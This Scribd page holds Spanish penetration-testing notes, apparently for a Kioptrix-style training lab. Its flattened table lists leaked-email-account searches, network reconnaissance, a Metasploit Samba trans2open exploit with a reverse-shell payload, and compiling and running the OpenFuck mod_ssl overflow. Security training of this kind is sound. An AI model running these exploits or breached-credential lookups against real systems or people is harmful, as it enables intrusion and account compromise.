0% encontró este documento útil (0 votos)
59 vistas4 páginas

Herramientas y Técnicas de Explotación en Redes

Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
59 vistas4 páginas

Herramientas y Técnicas de Explotación en Redes

Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

Aplicación Detalle

Navegador preferido Sitio objetivo el cual vamos analizar


HUNTER Revisar el formato de las cuentas de correo de los objetivos
BreachCompilation Realizar las busquedas de las cuentas de correo filtradas
SHODAN Mirar las direcciones IP atadas al dominio y todos sus registros
ABUSEIP
TALOS Mirar la Geo Localizacion de la IP
WHATISMYIP
DNSDUMPSTER Buscar toda la informacion de un dominio
KALI Hacer la busqueda desde Kali Linux
KALI Montar la carpeta de Breach Parse que tienes descargada en tu windos
dpkg -i NESUS
NESUS Iniciar Nesus
[Link]
arp-scan -l
netdiscover -r [Link]/24
Reconocimiento nmap -sn [Link]/24
Advanced-IP scaner - Windows
ping [Link]
nmap -p- T4 -sS -vv [Link]
[Link]
nmap -sV -p22,80,111,139,443,1024 -T4 -vv [Link] -oA kio-version
xsltproc [Link] -o [Link]
nmap -sV -p22,80,111,139,443,1024 -vv -O -A -T4 [Link]
Dirbuster desde Kali
smbclient -L [Link] -N
Ruta: / > /usr/share/dirbuster/wordlists/[Link]
Enumeracion
enum4linux 192.168.0.X
msfconsole
msf6 > search smb_version
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options
msf6 auxiliary(scanner/smb/smb_version) > set RHOST [Link]
msf6 auxiliary(scanner/smb/smb_version) > exploit
[Link]

EXPLOITS
Link
[Link]
complemento del navegador
Utilizar Powershell, Kali Linux, Notepad++
[Link]
[Link]
[Link]
[Link]
[Link]
Setings>options>Shared Folders y agregar la ruta
sudo mount -t [Link]-fuse .host:/ /home/kali/Desktop/brach -o allow_other
[Link]
systemctl
Registrarse y seeccionar nesus Escentials

Descubrir todos los equipos conectados a la red

[Link]
Analizar los ttl de respuesta

Convertir los archivos de xml a html


Consultar el Sistema Operativo
Realizar un fuzzin de directorios
Mirar que se tiene compartido
unidades compartidas SMB en un servidor
Desade mfsconsole debes buscar la version de smb
Vamos a buscar la version del smb
Seleccionar el auxiliar a utilizar
Mirar opciones que podemos utilizar
Seleccionar el objetivo
correr el exploit

Buscar exploit de las versiones de los servicios desactualizados


[Link]
EXPLOITS searchploit===> usarlo desde kali
# searchsploit samba 2.2
# searchsploit Apache 1.3
msfconsole
msf6 > search trans2open
msf6 > use exploit/linux/samba/trans2open
msf6 exploit(linux/samba/trans2open) > set RHOSTS 192.168.0.X
exploit
[-] Meterpreter session 1 is not valid and will be closed
Explotacion
msf6 exploit(linux/samba/trans2open) > set payload payload/linux/x86/shell_reverse_tcp
Automatizada exploit
whoami
bash -i
cd /root ; cd /home
[root@kio-kid home]# find / -name bandera*.txt 2>/dev/null
[root@kio-kid home]# cat /home/john/[Link]
# searchsploit mod_ssl
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) |
(root㉿kali)-[/home/hmstudent/Desktop/KIO/XPLOIT]
unix/remote/47080.c
# searchsploit -x 47080.c
# searchsploit -m 47080.c
Buscar OpenFuckV2 en Exploit DB y en Sploitus
─# head 47080.c
Explotacion manual
gcc -o OpenFuck OpenFuck.c -lcrypto
gcc -o martes 47080.c -lcrypto
ls
./martes
./martes target box [port] [-c N]
./martes 0x6a 192.168.0.X 443 -c 45
./martes 0x6b 192.168.0.X 443 -c 45
Buscar exploit de las versiones de los servicios desactualizados

Buscamos el exploit que vamos a utilizar


cargamos el exploit
Seleccionamos el objetivo

Muchos detectan ya los exploits como firmas conocidas y bloquean la comunicación.

Comandos que se pueden ejecutar para confirmar si estas en el equipo

Crear una carpeta para guardar el exploit


Sirve para leer el exploit, y te explica como funciona el exploit
Sirve para descargar el exploit
Buscar los exploits de manera web
Ver la cabecera del exploit
Reemplazar OpenFuck por el nombre que le vas a poner al exploit y OpenFucj.c por el numero del exploit

listar el exploit
revisar los pre-requsitos para ejecutarlo

También podría gustarte